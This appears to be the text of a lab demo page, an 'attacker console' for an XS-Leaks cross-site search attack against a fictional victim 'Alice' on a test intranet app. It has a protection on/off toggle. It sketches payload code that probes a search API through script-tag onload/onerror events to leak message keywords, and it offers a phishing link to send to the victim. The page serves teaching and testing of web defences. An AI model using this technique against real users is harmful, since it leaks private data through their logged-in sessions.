πŸ’€ XS-Leaks Demo // attacker console
Victim: checking…

Attack 1 β€” XS-Search via Error Events

The payload loads each keyword as a <script src="…"> pointing at the victim API. HTTP 200 fires onload (HIT). HTTP 404/401 fires onerror (MISS / blocked).

How it works

Payload running in Alice's browser at https://attacker.ssc-primesec.de: for each keyword: const s = document.createElement('script') s.src = 'https://intravault.ssc-primesec.de/api/messages/search?q=bonus' ↳ cookie is NOT sent (cross-site + SameSite=Lax) when PROTECTED ↳ server skips cookie check when VULNERABLE s.onload = () => report('HIT') ← HTTP 200 s.onerror = () => report('MISS') ← HTTP 404 (no match) or 401 (no cookie)
Target: https://intravault.ssc-primesec.de/api/messages/search
Oracle: HTTP 200 vs 404/401
Leaks: Message keywords

πŸ“Ž Phishing link β€” send this to Alice

https://attacker.ssc-primesec.de/payload/1
β†— Open as Alice
Alice must be logged in at intravault.test:3000. If victim protection is 🟒 ON β†’ attack fails. If πŸ”΄ OFF β†’ attack succeeds.

πŸ“‘ Live results β€” waiting for Alice's browser

Waiting for payload to execute…